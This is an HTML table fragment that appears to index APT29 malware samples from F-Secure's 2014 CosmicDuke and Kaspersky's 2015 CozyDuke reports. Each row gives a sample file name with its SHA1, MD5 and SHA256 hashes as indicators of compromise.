<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">74BC93107B1BBAE2D98FCA6D819C2F0BBE8C9F8A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fc0e380447be2bbdf9f06fc3358f8648</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b3236d1d0924cd9a17babd13209fe6706fd3a9228f22fe658eb4eb0c71360b73</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7631F1DB92E61504596790057CE674EE90570755</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">20d86cb4ebbffb739faa47f7354ee134</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d5f1d8d2629b91744fe812207cb3f0bebfd1aec9937b7744a263d1a4e3421063</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">764ADD69922342B8C4200D64652FBEE1376ADF1C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e175be029dd2b78c059278a567b3ada1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2146da9bc0e27d7eb10983b7dd89f250fa0015ce284dde8f0bb6a79626d34a2a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7803F160AF428BCFB4B9EA2ABA07886F232CDE4E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b59199877e0d68a5e93fc8ea76374ed1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b50e26a01b320f05d66727e9d220d5858cdac203ff62e4b9ced1cafc2683637</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8949C1D82DDA5C2EAD0A73B532C4B2E1FBB58A0E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23d2592db15c251382706515cf4fd37e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7e9c0bda27bbc80d947bc0c6ce29a19c824288d2b481f92a1637b7b8dfc8b81c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8AA9F5D426428EC360229F4CB9F722388F0E535C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a874e5ecd67dffab45e17e9b730daed</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">51b4e69183f3d02124f3314cc64a7869425f053d8021c74c12f21d7c2afe2163</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9700C8A41A929449CFBA6567A648E9C5E4A14E70</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">608b22fcd2d067730176e335d3c6454b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4fc0bbb90aeecd3229aa932437273ba59f887a6eac569b56693602b957e205e2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B54B3C67F1827DAB4CC2B3DE94FF0AF4E5DB3D4C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f611f8b0655a8980cf71a252536c7a5a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">16870c6b572934f5a106d5f632b6d41bb23924c12ddf172be24c6dfca25226b1</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C671786ABD87D214A28D136B6BAFD4E33EE66951</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2aa2a6e004159b9e3a590c63a0cc47b3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ba35aa14ccc0e4fa8e47b621ea1d1efe1b012b623afd469e56015c0857fec646</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CCB29875222527AF4E58B9DD8994C3C7EF617FD8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0be02d5f66f84ebd03f362ad4b4a06e6</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">04819cde7e928e6ff376daeb73b894959f672a85b363753c227416fc0f4a8acd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ED14DA9B9075BD3281967033C90886FD7D4F14E5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">acac7584d7dc066d27555997d0f6d6cf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9c2562e05eb940ae8d73c9baa7cfe85cb3ec619689227f65e4fbeeb3fec598ad</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F621EC1B363E13DD60474FCFAB374B8570EDE4DE</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d824cbf08604dea9724ab8e707bb9fec</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">68355d29ce79a5177084fe6292f0f8b9daa2018c571b552fff9f4a0815b432ce</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">FECDBA1D903A51499A3953B4DF1D850FBD5438BD</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dffcd7f930f8874dc9f5115d0ae50b57</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3e889cd495e008760fd12751d6d45cadf8a7280c4545f2ebe469f84b9b77c835</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1A262A7BFECD981D7874633F41EA5DE8_5463.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a262a7bfecd981d7874633f41ea5de8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">099524703c250d1d1a16288dbd2f425d6cd0491f608e207a82f239b39bb26b7e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1A42ACBDB285A7FBA17F95068822EA4E_ativvaxy_cik.dat_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a42acbdb285a7fba17f95068822ea4e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4464c945c88ac9a4a22e86f0922f18c164e87f26c3f3fa054eb488fdd7d4bfc8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2AABD78EF11926D7B562FD0D91E68AD3_ Monkeys.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2aabd78ef11926d7b562fd0d91e68ad3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f9ff78669e4b251ac1e31076eaf420bee6f2060dbc926cc33603f893658ca86c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3D3363598F87C78826C859077606E514_ player.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d3363598f87c78826c859077606e514</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">01468b1d3e089985a4ed255b6594d24863cfd94a647329c631e4f4e52759f8a9</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57A1F0658712EE7B3A724B6D07E97259_ _3852.exe__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57a1f0658712ee7b3a724b6d07e97259</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc5625c674f08cca18e73eb661eed0182ef16e27983098cf1c61892ca621d60b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57A1F0658712EE7B3A724B6D07E97259_3852.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">57a1f0658712ee7b3a724b6d07e97259</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bc5625c674f08cca18e73eb661eed0182ef16e27983098cf1c61892ca621d60b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6761106F816313394A653DB5172DC487_ amdhcp32.dll__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6761106f816313394a653db5172dc487</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">37ceea0922d1177a9de74f4858678acf6afd22706489fcca35a509bca9688cb7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7F6BCA4F08C63E597BED969F5B729C56_ aticalrt.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7f6bca4f08c63e597bed969f5b729c56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">65fa52f632e4e83ff83120c7df6b90291025a76d5daeb183e814ec0b3bd2bd4e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">83f57f0116a3b3d69ef7b1dbe9943801.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">83f57f0116a3b3d69ef7b1dbe9943801</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fdd7e8582ef8d7a23f269653435582cfe924ca9b2db34af63af5e57d1f3e09c2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8670710bc9477431a01a576b6b5c1b2.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8670710bc9477431a01a576b6b5c1b2a</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1233cca912fb61873c7388f299a4a1b78054e681941beb31f0a48f8c6d7a182b</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">90BD910EE161B71C7A37AC642F910059_5463.exe__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">90bd910ee161b71c7a37ac642f910059</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ff9edb92ee8125519aa1eea60cab9999bcd4caa87b891882caddc73a2a5ae9cf</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93176DF76E351B3EA829E0E6C6832BDF_ hppscan854.pdf_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">93176df76e351b3ea829e0e6c6832bdf</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">950c8f9dbec3a2a1603f9202408cf49ea5a9573c7296e5940a42581cbd6fc8c2</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">95B3EC0A4E539EFAA1FAA3D4E25D51DE_Office Monkeys (Short Flash Movie).exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">95b3ec0a4e539efaa1faa3d4e25d51de</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7fd72a36f7e0e6e0a8bc777fc9ed41e0a6d5526c98bc95a09e189531cf7e70d5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9AD55B83F2EEC0C19873A770B0C86A2F_reader_sl.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9ad55b83f2eec0c19873a770b0c86a2f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7cdb9c2e8b6ca7f0a683a39c0bdadc7a512cff5d8264fdec012c541fd19c0522</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9AD55B83F2EEC0C19873A770B0C86A2F_reader_sl.exe__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9ad55b83f2eec0c19873a770b0c86a2f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7cdb9c2e8b6ca7f0a683a39c0bdadc7a512cff5d8264fdec012c541fd19c0522</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9E3F3B5E9ECE79102D257E8CF982E09E_Cache.dl_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9e3f3b5e9ece79102d257e8cf982e09e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8d86c0985530271618a342579afd1a9ecb27dfb080866e3b888bd3e45e1eb8f5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A5D6AD8AD82C266FDA96E076335A5080_reader_sl.exe_2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a5d6ad8ad82c266fda96e076335a5080</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7ed2d1aceab5f54df4acca63b5d269842d49521e13bab5e652237667c7eef261</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">B5553645FE819A93AAFE2894DA13DAE7_ amd_opencl32.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b5553645fe819a93aafe2894da13dae7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1a7239c006a3adf893bdb5c2300b2964ed8bb454e1b622853e4460707dc63c16</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D543904651B180FD5E4DC1584E639B5E_3852.ZIP_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d543904651b180fd5e4dc1584e639b5e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6a177de940ba477574947ed2d06fd7c08c7baf04b83cb7f3a46e4a93f889bf64</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D596827D48A3FF836545B3A999F2C3E3_ aticaldd.dll__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d596827d48a3ff836545b3a999f2c3e3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D596827D48A3FF836545B3A999F2C3E3_aticaldd.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d596827d48a3ff836545b3a999f2c3e3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0dc7438be5b21a36651de0a08361b18d76f0920517a7d51f75dc234740f392ca</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EB22B99D44223866E24872D80A4DDEFD_ reader_sl.exe__</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">eb22b99d44223866e24872d80a4ddefd</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f722677df4fb7eb4ac986a944d4f6630b91ac22b31f8d39ec9bf941376d5d4db</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F16DFF8EC8702518471F637EB5313AB2_ hppscan854.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f16dff8ec8702518471f637eb5313ab2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2b160b7eef5ce5fdb83889f96fc40cbbbc7b85450ff2afdf781a8eb5d6a0f541</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F58A4369B8176EDBDE4396DC977C9008_reader_sl.exe_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f58a4369b8176edbde4396dc977c9008</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">30c69d91247f8a72a69e4d7c4bce3eafba40975e5890c23dc4dbe7c9a11afa73</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2015-04_Kaspersky_CozyDuke-CozyBear</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f2b05e6b01be3b6cb14e9068e7a66fc1.dll_</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f2b05e6b01be3b6cb14e9068e7a66fc1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">036c5c0075d67f67fee546321f5b9c4f00d37aa9249ffe1627e71946bad4a3d1</span></td></tr>
